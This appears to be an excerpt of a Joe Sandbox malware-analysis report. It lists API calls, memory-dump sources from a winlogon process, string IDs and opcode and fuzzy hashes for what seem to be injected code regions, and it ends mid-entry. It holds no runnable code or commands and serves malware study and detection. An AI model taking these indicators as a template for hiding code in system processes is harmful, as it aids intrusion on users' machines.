                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649B31
                                                          • GetLastError.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: f95e28dfc33ca7a534d3acc35b749e714b97f789a20428665c6926e110095462
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: BB31083932EF20E1EE11DB8AA8083963398F745BA2F598664DD1F47798EF38C445C300
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679B31
                                                          • GetLastError.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 276d377e687f46c3aa104caac818f91fda4273325fc345cc73579293a92bb68b
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 4531B639322F60E1EE11DB9A980879623D4FB54FA2F598925DD1D47BD8EF38C445C310
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9B31
                                                          • GetLastError.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: cbb0e091a5e8a0647ed17d91b748296e3a1bfd377bedf59ef4bbecbc16baf3ff
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: F131C839322F60A5EF12DB8A980879623D4F754BA2F798525DD1E87794EF38C445C310
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: 2033734ead1eee0760fe514e4fb1f343eab727be6a9dda2dd37494602eb1d2d3
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: CC118239320F6096E7508B9AE85C71A67A1F798FE6F648224EA5E87B94DF38C404C744
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: e1a00947360858de61993c59da533af345ba0edd2cc76b84ab314fa3198168f4
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: BF116329310F5096F750CB9AE858719B6A0FB88FE6F548224EA5E87BD4DF38C804C745
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: eab7698497ab3c3cf8f4afe5226ac72d14a90ac433ca77d2e065e95d4af5d053
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: 92119D29310F6096E7618BDAE858719A6B5F798FE6F408224EA5E87B94DF38C804C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: caf8dc8176cc31464ede950ed0476c3e746fbfb24309561ee861608c75650903
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 25D1BC3A208F98D1DA70DB9AE49835A77A0F388B89F504516EACD47BA9DF3DC551CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: cb876ffcc14d7cc9c0fe1fa7ca300b15f0f6236db7f881f70835ddb0c2e5d4df
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: C2D19C7A204F9895DA70DB8AE49835AB7B0F788B89F108116EACD877A5DF3DC551CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 849b2c283a368bd6b7d8b5e5c29e36bcfd87e21499934034f9761d219d4f3126
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 99511A3821DF65B5EF06DFECD85869833A1FB0474AF808895A62E073A5EF78D519C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 3468bd196747705ecafc2d2c23a9d117d4093727daae3abfadfed312507525d0
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 8151A539201F65E5EB06DFACDC5829423A1FB08746F948C25A66D0ABE5FF78C559C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: b1319a00c32cb94045c832397be3abdb361cabce2a89a9de64fabfa9db851202
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 6B51EB3D281F65B5EF06DFACD89829433A1FB04746F948815AA2D867A5FF78C929C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: b35f4ad6ca57cd50bb25f75fbccfe027727c3404bd0641e538bb20a3c2fd2b0d
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: C3318229719F7AA2EA21DF9AE54876977A0FB44F95F18C0309F4A07B55EF34C461C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 0e933dde1ac2161e9d029eb9aafddf3f36767926d58ae12a26d993e46f5d1c6f
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 09318E2A701F75A3EA11DFAAE54876963A0FB44F96F28C8309F4807B95EF38C461C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 662f470960be3b878308010d86b6d609a759a17dc0fb21496952c4ebb4f02033
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 4A31CE2A701F61A3EA11DF9AE548369A3A1FB54F96F18D0309F4887B65EF38C461C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: c0e29f2d3459f78ac5c5c32710ade1ac8fc7e6770d5076c999ee149a55dd3a23
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: 7C11702D71CE7072FA5867F9A81D36F3252AB85792F54C6B4E967563C6DE38C401C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: a875aa4653512ee24e7d2212af4580c3c98327b6d20060586ee3abada98c9fb9
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: E911863D314E7072FA54A7F9681D36E1251AB84792F54CE24E9776ABC6DE38C402C341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: 94ee8105368b08318b792b932de3e76bbedc80c5542e1ae07ef22bd2515019d7
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: DC11512D304F7072FA54E7F9681D3AE1252AB85792F64C624E967D77D6DE38C801C305
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 3604fe474655a38b0f3721542f876a5644352f74d76c3b4a2e8730e16adc028e
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: DD018C29718F5092EB10DB9AE85C35963A1FB88FC2F988034DE8E43754EE3CC985C780
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 4a60fd448daebfd72795b6413df16e4f1a81462a1859d3eee0ae49abe6fc46b7
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
